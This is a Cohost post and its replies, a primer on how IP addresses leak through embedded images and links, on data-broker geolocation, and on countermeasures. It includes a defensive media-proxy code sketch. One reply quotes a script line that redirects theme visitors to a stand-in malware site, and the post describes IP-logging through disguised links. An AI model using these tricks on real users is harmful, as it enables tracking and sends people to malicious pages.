
vallerie
@vallerie

There's a lot of people who are kind of rightfully scared by "did u know ANY POST on cohost can leak where u live!!! 🤯" posts doing the rounds on here, and especially so on other sites with strict character limits.

I feel somewhere in the midst of VPN ads taken by clueless YouTubers, and the death (if it was ever born to begin with) of accurate tech reporting, we got lost as to the actual threat model brought about by people getting your IP address.

So - here's a little primer on IP addresses, how people get them, what that means for you, and some commentary on the commentary

what is an IP address?

  • an IP address is a semi-uniquely linked identifier, designed to designate where little bundles of data should end up on the internet
  • you have a private address - this is generally used for devices on your network talking to each other, without involving the outside world
  • you also have a public address - this is for the outside world to be able to send data to your network
  • it's nice it's called an address, because you can think of it being a little end destination for data

how would someone get my IP address?

  • you give out this identifier when you do anything, at all, on the internet. without it, the internet wouldn't function, because the internet relies on being able to send data bidirectionally, and, know the source
  • this includes any site that you load images from
  • Cohost posts (along with most blogging platforms...) can embed images from other websites
  • however, if you were to visit a unique link - specifically here, load an image from a Cohost post set to private, for example - someone trying to get your IP address could see the one request being made, and, get the address associated
  • most social media sites, and some blogging platforms "solve" this problem away by having you talk directly to their server to load in external data, such that the external website just sees the social media website's IP address

what's the danger in someone having my IP?

  • an IP address kind of gives your unique location, to an extent - the way your IP is truly linked to your location properly is through data brokers selling your IP address along with GPS data collected from various sources (such as apps on your phone)
  • the primary goal of this is for advertisers, but, of course, anyone can buy from databrokers, including a variety of sites which just do fairly accurate reporting on the location related to an IP
  • most ISPs will not give you a constant IP address. generally restarting your router will get you a new IP address and using a proxy in between to load images
  • if you are susceptible to the kind of risk where users having your IP address would pose harm, use some way of routing traffic through another server (such as VPN)

is Cohost unique in "leaking" my IP address?

  • No. You're giving your IP address when you browse the internet, play games online - because, again, any time you use something online, your IP is required

how do I solve this?

  1. Think about if your threat model would be at risk by someone having your IP. For most people, you aren't at risk.
  2. If you are at risk, use a VPN whenever you use the internet, at all times. There's no half assing this, because, whenever you use the internet, your IP is required. (if you use Safari on macOS or iOS, and, pay for iCloud - Apple Private Relay will do this by default without you thinking about it! it's not bulletproof as it doesn't work for other browsers, but it's a good option for casual use. go turn it on!)
  3. If you can't afford a VPN, consider rotating your IP address by rebooting your wifi router frequently. This doesn't solve the issue, but, because an IP address is a pretty broad range when it comes to location, getting a new IP frequently will generally prevent an IP from being linked too specifically for you.
  4. If you can't afford a VPN and can't reboot your router (e.g. living in University dorms) - install a browser extension to block all offsite content. There's multiple options available for this - I've heard good things about uMatrix
  5. If you can't install a browser extension, can't afford a VPN, and can't reboot your router - don't look at content to which only a small audience may be looking (i.e. following private pages). If enough people look at posts, the IP addresses will just become noise.

how does Cohost solve the image IP-leaking problem?

They uh. Don't. Or, they can, but, it costs a lot of money to run a media proxy in terms of bandwidth - and, being real here, it's like fighting a losing battle. You can just as easily get someone's IP by just embedding a link that looks like one thing, but, is really another https://google.com (<-- this isn't malicious, it'll just take you to a YouTube video) - and, this technique works on any website that allows markdown or adding links to text (including the recently publicly traded Reddit).
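The media-proxy approach mentioned above (the site loads external images itself, so the third-party host only sees the site's address), sketched as an added example; this is not Cohost's or the post author's code. The proxy endpoint, host names and signing key are assumptions, and the signature is there so the proxy only fetches URLs the platform itself issued.

```python
import hashlib
import hmac
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlsplit

PROXY_BASE = "https://media.example.test/fetch"  # assumed proxy endpoint
SITE_HOSTS = {"blog.example.test"}               # assumed first-party hosts
KEY = b"constructed-demo-key"                    # placeholder signing key
SAMPLE = ('<p>hi &amp; bye</p><img src="https://tracker.example.test/p.png?u=42">'
          '<img src="/static/logo.png"/>')       # constructed post HTML

def sign(url):
    return hmac.new(KEY, url.encode(), hashlib.sha256).hexdigest()

def proxied(url):
    """Signed proxy URL for a third-party image URL."""
    return f"{PROXY_BASE}/{sign(url)}?url={quote(url, safe='')}"

def verify(sig, quoted_url):
    """Proxy side: return the upstream URL if the signature matches, else None."""
    url = unquote(quoted_url)
    return url if hmac.compare_digest(sig, sign(url)) else None

class ImgRewriter(HTMLParser):
    """Re-emit post HTML with third-party <img src> pointed at the proxy."""
    def handle_starttag(self, tag, attrs):
        parts = []
        for name, value in attrs:
            value = value or ""
            if tag == "img" and name == "src":
                value = "https:" + value if value.startswith("//") else value
                host = urlsplit(value).hostname  # None for relative and data: URLs
                value = proxied(value) if host and host not in SITE_HOSTS else value
            parts.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(parts)}>")
    def handle_startendtag(self, tag, attrs):    # <img ... /> form
        self.handle_starttag(tag, attrs)
    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def rewrite(post_html):
    parser = ImgRewriter()
    parser.out = []
    parser.feed(post_html)
    parser.close()
    return "".join(parser.out)
```

Only `src` is rewritten here; `srcset` and images loaded from CSS would need the same treatment, and the proxy itself still has to pay for the bandwidth the post talks about.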



in reply to @vallerie's post:

Wait this is the opposite thing, no? If you're pasting an image, tumblr will be hosting it. The question is whether you can create an <img> tag that loads an external image when the post is viewed.

(also that's the same amount easy as cohost, where you can also paste images into the compose box)

When I copy + pasted one of my posts from here into Tumblr, all the images that were hosted here in the post on here were hosted here in the post on Tumblr.

It was weird. No "maybe copy + paste the image" or whatever — it copy + pasted "this image hosted on Cohost".

huhhhh. what OS? this kinda has to be at least in part a behavior of the clipboard, which for me (macos) i believe includes the image data not the html if you "copy image", but (seems to, i think) contain the html if you select a region that includes an image on a webpage and copy.

If you clicked edit, selected the text from the post input, and pasted it into tumblr, then it'd copy the Cohost URLs you used for the images in the post over to Tumblr as you described.

The only way I can think of (not knowing the Tumblr post editor at all but assuming it supports this) to copy-paste an image at all in that context would be right-clicking images individually, selecting "copy image", and pasting them in one-by-one into the post on Tumblr, which we'd expect to be hosted on Tumblr since you're re-uploading them that way.

I don't think a lot of lay-users knew you could do this with external images, tbh (I certainly didn't). Even the kind of relatively tech-savvy users who know what a media server even is (moi) and I don't wanna think about how small that demographic has gotten
(also, you definitely can, but I'm not sure if tumblr has a media proxy or not? I don't have an account anymore to investigate myself/wouldn't really know how to/it's early and I haven't had coffee yet)

I don't believe you can on Tumblr posts - I think they just get silently copied into the site.

But - I think you could in Tumblr themes (at least, you used to be able to 10 years ago!) -- and, being real, Tumblr themes are just webpages in themselves, so you can just do <script>document.location = "https://my-fav-malware.site"</script> if you wanted to be evil about it. or at least, you used to be able to. maybe they fixed this!

On IP logging - I wouldn't be shocked if Tumblr uses some kind of media proxy for custom themes, but, I also wouldn't be shocked if they don't - if only because tumblr is fundamentally a blogging platform with some social media tacked on.

Just getting people to click on something, even if it doesn't result in an IP address, sometimes is all the information a person needs.

Anyone who has played EVE Online a while knows to not click on links in wormhole space.

For the uninitiated, wormhole space is like a pocket universe disconnected from the main in-game network, and thus the player doesn't get a list of other players in that pocket.

One of the easiest ways to figure out if you're alone in these spaces or not is to simply post a link to some random imgur pic, and then watch for the view count to increment.

Any interaction with an outside network whatsoever can be a tell, if not for a location, then for something else. Threat models should be adjusted accordingly.

That said, unless you're about to dump state secrets or live in a country that loves to stone queer people to death, your countermeasures don't need to be elaborate. Most people really work themselves up over nothing, and they can often draw attention to themselves by poorly implementing countermeasures instead of just blending in with the crowd.

i adore stories about EVE Online because it's like. yeah of course the spaceship game makes you think about this kind of thing.

and on the last paragraph - I love Tom Scott's bit about "if you're gay, a pirate, an assassin, or a gay pirate assassin" because it's such a good way to explain this kinda stuff.

Had a middle school buddy whose prized possession he'd show off to select friends like a trove of woods porn was his copy of nmap, I'm fairly positive he'd yell shit like that while pinging his enemies
